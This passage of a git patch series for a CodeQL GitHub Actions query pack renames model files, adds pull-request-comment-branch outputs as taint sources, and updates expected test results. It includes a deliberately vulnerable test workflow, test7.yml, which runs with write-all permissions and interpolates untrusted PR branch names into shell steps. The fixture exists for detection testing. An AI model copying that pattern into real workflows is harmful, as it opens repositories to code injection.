a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml similarity index 100% rename from ql/lib/ext/leafo_gh-actions-lua.model.yml rename to ql/lib/ext/manual/leafo_gh-actions-lua.model.yml diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml similarity index 100% rename from ql/lib/ext/leafo_gh-actions-luarocks.model.yml rename to ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml similarity index 100% rename from ql/lib/ext/lucasbento_auto-close-issues.model.yml rename to ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml similarity index 100% rename from ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml rename to ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/manual/magefile_mage-action.model.yml similarity index 100% rename from ql/lib/ext/magefile_mage-action.model.yml rename to ql/lib/ext/manual/magefile_mage-action.model.yml diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/manual/maierj_fastlane-action.model.yml similarity index 100% rename from ql/lib/ext/maierj_fastlane-action.model.yml rename to ql/lib/ext/manual/maierj_fastlane-action.model.yml diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml similarity index 100% rename from ql/lib/ext/manusa_actions-setup-minikube.model.yml rename to ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/manual/marocchino_on_artifact.model.yml similarity index 100% rename from ql/lib/ext/marocchino_on_artifact.model.yml rename to ql/lib/ext/manual/marocchino_on_artifact.model.yml diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/manual/mattdavis0351_actions.model.yml similarity index 100% rename from ql/lib/ext/mattdavis0351_actions.model.yml rename to ql/lib/ext/manual/mattdavis0351_actions.model.yml diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml similarity index 100% rename from ql/lib/ext/meteorengineer_setup-meteor.model.yml rename to ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml similarity index 100% rename from ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml rename to ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml similarity index 100% rename from ql/lib/ext/microsoft_setup-msbuild.model.yml rename to ql/lib/ext/manual/microsoft_setup-msbuild.model.yml diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml similarity index 100% rename from ql/lib/ext/mishakav_pytest-coverage-comment.model.yml rename to ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml similarity index 100% rename from ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml rename to ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/manual/msys2_setup-msys2.model.yml similarity index 100% rename from ql/lib/ext/msys2_setup-msys2.model.yml rename to ql/lib/ext/manual/msys2_setup-msys2.model.yml diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml similarity index 100% rename from ql/lib/ext/mxschmitt_action-tmate.model.yml rename to ql/lib/ext/manual/mxschmitt_action-tmate.model.yml diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml similarity index 100% rename from ql/lib/ext/mymindstorm_setup-emsdk.model.yml rename to ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml similarity index 100% rename from ql/lib/ext/nanasess_setup-chromedriver.model.yml rename to ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/manual/nanasess_setup-php.model.yml similarity index 100% rename from ql/lib/ext/nanasess_setup-php.model.yml rename to ql/lib/ext/manual/nanasess_setup-php.model.yml diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/manual/nick-fields_retry.model.yml similarity index 100% rename from ql/lib/ext/nick-fields_retry.model.yml rename to ql/lib/ext/manual/nick-fields_retry.model.yml diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/manual/octokit_graphql-action.model.yml similarity index 100% rename from ql/lib/ext/octokit_graphql-action.model.yml rename to ql/lib/ext/manual/octokit_graphql-action.model.yml diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/manual/octokit_request-action.model.yml similarity index 100% rename from ql/lib/ext/octokit_request-action.model.yml rename to ql/lib/ext/manual/octokit_request-action.model.yml diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml similarity index 100% rename from ql/lib/ext/olafurpg_setup-scala.model.yml rename to ql/lib/ext/manual/olafurpg_setup-scala.model.yml diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml similarity index 100% rename from ql/lib/ext/paambaati_codeclimate-action.model.yml rename to ql/lib/ext/manual/paambaati_codeclimate-action.model.yml diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml similarity index 100% rename from ql/lib/ext/peter-evans_create-pull-request.model.yml rename to ql/lib/ext/manual/peter-evans_create-pull-request.model.yml diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml similarity index 100% rename from ql/lib/ext/peter-murray_issue-body-parser-action.model.yml rename to ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml similarity index 100% rename from ql/lib/ext/plasmicapp_plasmic-action.model.yml rename to ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml similarity index 100% rename from ql/lib/ext/preactjs_compressed-size-action.model.yml rename to ql/lib/ext/manual/preactjs_compressed-size-action.model.yml diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/manual/py-actions_flake8.model.yml similarity index 100% rename from ql/lib/ext/py-actions_flake8.model.yml rename to ql/lib/ext/manual/py-actions_flake8.model.yml diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml similarity index 100% rename from ql/lib/ext/py-actions_py-dependency-install.model.yml rename to ql/lib/ext/manual/py-actions_py-dependency-install.model.yml diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/manual/pyo3_maturin-action.model.yml similarity index 100% rename from ql/lib/ext/pyo3_maturin-action.model.yml rename to ql/lib/ext/manual/pyo3_maturin-action.model.yml diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml similarity index 100% rename from ql/lib/ext/reactivecircus_android-emulator-runner.model.yml rename to ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml similarity index 100% rename from ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml rename to ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml similarity index 100% rename from ql/lib/ext/reggionick_s3-deploy.model.yml rename to ql/lib/ext/manual/reggionick_s3-deploy.model.yml diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/manual/renovatebot_github-action.model.yml similarity index 100% rename from ql/lib/ext/renovatebot_github-action.model.yml rename to ql/lib/ext/manual/renovatebot_github-action.model.yml diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/manual/roots_issue-closer-action.model.yml similarity index 100% rename from ql/lib/ext/roots_issue-closer-action.model.yml rename to ql/lib/ext/manual/roots_issue-closer-action.model.yml diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml similarity index 100% rename from ql/lib/ext/ros-tooling_setup-ros.model.yml rename to ql/lib/ext/manual/ros-tooling_setup-ros.model.yml diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/manual/ruby_setup-ruby.model.yml similarity index 100% rename from ql/lib/ext/ruby_setup-ruby.model.yml rename to ql/lib/ext/manual/ruby_setup-ruby.model.yml diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml similarity index 100% rename from ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml rename to ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/manual/sergeysova_jq-action.model.yml similarity index 100% rename from ql/lib/ext/sergeysova_jq-action.model.yml rename to ql/lib/ext/manual/sergeysova_jq-action.model.yml diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml similarity index 100% rename from ql/lib/ext/shallwefootball_upload-s3-action.model.yml rename to ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml similarity index 100% rename from ql/lib/ext/shogo82148_actions-setup-perl.model.yml rename to ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml similarity index 100% rename from ql/lib/ext/skitionek_notify-microsoft-teams.model.yml rename to ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/manual/snow-actions_eclint.model.yml similarity index 100% rename from ql/lib/ext/snow-actions_eclint.model.yml rename to ql/lib/ext/manual/snow-actions_eclint.model.yml diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml similarity index 100% rename from ql/lib/ext/stackhawk_hawkscan-action.model.yml rename to ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/manual/step-security_harden-runner.model.yml similarity index 100% rename from ql/lib/ext/step-security_harden-runner.model.yml rename to ql/lib/ext/manual/step-security_harden-runner.model.yml diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml similarity index 100% rename from ql/lib/ext/suisei-cn_actions-download-file.model.yml rename to ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/manual/tibdex_backport.model.yml similarity index 100% rename from ql/lib/ext/tibdex_backport.model.yml rename to ql/lib/ext/manual/tibdex_backport.model.yml diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml similarity index 100% rename from ql/lib/ext/timheuer_base64-to-file.model.yml rename to ql/lib/ext/manual/timheuer_base64-to-file.model.yml diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml similarity index 100% rename from ql/lib/ext/tj-actions_branch-names.model.yml rename to ql/lib/ext/manual/tj-actions_branch-names.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/manual/trilom_file-changes-action.model.yml similarity index 100% rename from ql/lib/ext/trilom_file-changes-action.model.yml rename to ql/lib/ext/manual/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml similarity index 100% rename from ql/lib/ext/tripss_conventional-changelog-action.model.yml rename to ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml similarity index 100% rename from ql/lib/ext/tryghost_action-deploy-theme.model.yml rename to ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml similarity index 100% rename from ql/lib/ext/tzkhan_pr-update-action.model.yml rename to ql/lib/ext/manual/tzkhan_pr-update-action.model.yml diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/manual/veracode_veracode-sca.model.yml similarity index 100% rename from ql/lib/ext/veracode_veracode-sca.model.yml rename to ql/lib/ext/manual/veracode_veracode-sca.model.yml diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/manual/wearerequired_lint-action.model.yml similarity index 100% rename from ql/lib/ext/wearerequired_lint-action.model.yml rename to ql/lib/ext/manual/wearerequired_lint-action.model.yml diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml similarity index 100% rename from ql/lib/ext/webfactory_ssh-agent.model.yml rename to ql/lib/ext/manual/webfactory_ssh-agent.model.yml diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml similarity index 100% rename from ql/lib/ext/xt0rted_slash-command-action.model.yml rename to ql/lib/ext/manual/xt0rted_slash-command-action.model.yml diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml similarity index 100% rename from ql/lib/ext/zaproxy_action-baseline.model.yml rename to ql/lib/ext/manual/zaproxy_action-baseline.model.yml diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml similarity index 100% rename from ql/lib/ext/zaproxy_action-full-scan.model.yml rename to ql/lib/ext/manual/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index abc56e6a090..aece8aacc5f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -11,6 +11,6 @@ dependencies: extractor: javascript groups: javascript dataExtensions: - - ext/*.model.yml - - ext/**/*.model.yml - - ext/workflow-models/workflow-models.yml + - ext/manual/*.model.yml + - ext/generated/**/*.model.yml + - ext/config/*.yml diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql index b3dc9185ec4..a4d4eb43bb2 100644 --- a/ql/test/library-tests/workflowenum.ql +++ b/ql/test/library-tests/workflowenum.ql @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions +import codeql.actions.config.ConfigExtensions as Extensions from string path, string trigger, string job, string secrets_source, string permissions, From 61797e91807695bff916e24cfd078e1bb5a4c848 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 13:27:08 +0200 Subject: [PATCH 0347/1267] Add pull_request-comment-branch head_ref as a source --- .../security/UntrustedCheckoutQuery.qll | 6 +++++- ...bell_pull-request-comment-branch.model.yml | 7 +++++++ .../manual/eficode_resolve-pr-refs.model.yml | 8 ++++++++ ...tson_pull-request-comment-branch.model.yml | 7 +++++++ .../manual/tj-actions_branch-names.model.yml | 2 -- ...rted_pull-request-comment-branch.model.yml | 7 +++++++ ql/test/library-tests/test.expected | 5 ++++- .../CWE-094/.github/workflows/test7.yml | 20 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 ++++++++ .../CWE-094/CodeInjectionMedium.expected | 6 ++++++ 10 files changed, 72 insertions(+), 4 deletions(-) create mode 100644 ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml create mode 100644 ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml create mode 100644 ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml create mode 100644 ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index a9c92e70ee5..90b0a74d0ec 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -133,7 +133,11 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and this.getArgument("ref").regexpMatch(".*head_sha.*") and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml new file mode 100644 index 00000000000..86ce17a9a9b --- /dev/null +++ b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml new file mode 100644 index 00000000000..8cdcabb2c11 --- /dev/null +++ b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"] + + diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml new file mode 100644 index 00000000000..f288c615a35 --- /dev/null +++ b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml index 91f3c056e6d..56f017635ce 100644 --- a/ql/lib/ext/manual/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/manual/tj-actions_branch-names.model.yml @@ -6,5 +6,3 @@ extensions: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "branch", "manual"] - diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml new file mode 100644 index 00000000000..e4b34c37d70 --- /dev/null +++ b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 18f72de36d1..b09473fc132 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -619,12 +619,15 @@ scopes sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | | ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | | amannn/action-semantic-pull-request | * | output.error_message | text | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | | googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | | jitterbit/get-changed-files | * | output.added | filename | manual | | jitterbit/get-changed-files | * | output.added_modified | filename | manual | | jitterbit/get-changed-files | * | output.all | filename | manual | @@ -639,12 +642,12 @@ sources | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | -| tj-actions/branch-names | * | output.ref_branch | branch | manual | | trilom/file-changes-action | * | output.files | filename | manual | | trilom/file-changes-action | * | output.files_added | filename | manual | | trilom/file-changes-action | * | output.files_modified | filename | manual | | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | | xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml new file mode 100644 index 00000000000..cae9358e8b7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml @@ -0,0 +1,20 @@ +name: Test +on: issue_comment +permissions: write-all +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: comment-branch + uses: xt0rted/pull-request-comment-branch@v2 + with: + repo_token: ${{ github.token }} + - id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ github.token }} + - run: | + echo "HEAD_REF1 from PR: ${{ steps.comment-branch.outputs.head_ref }}" + - run: | + echo "HEAD_REF2 from PR: ${{ steps.refs.outputs.head_ref }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index fdb5beb09aa..f34915f45c2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -65,6 +65,8 @@ edges | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -243,6 +245,10 @@ nodes | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -340,6 +346,8 @@ subpaths | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index bd20179796e..d919880e726 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -65,6 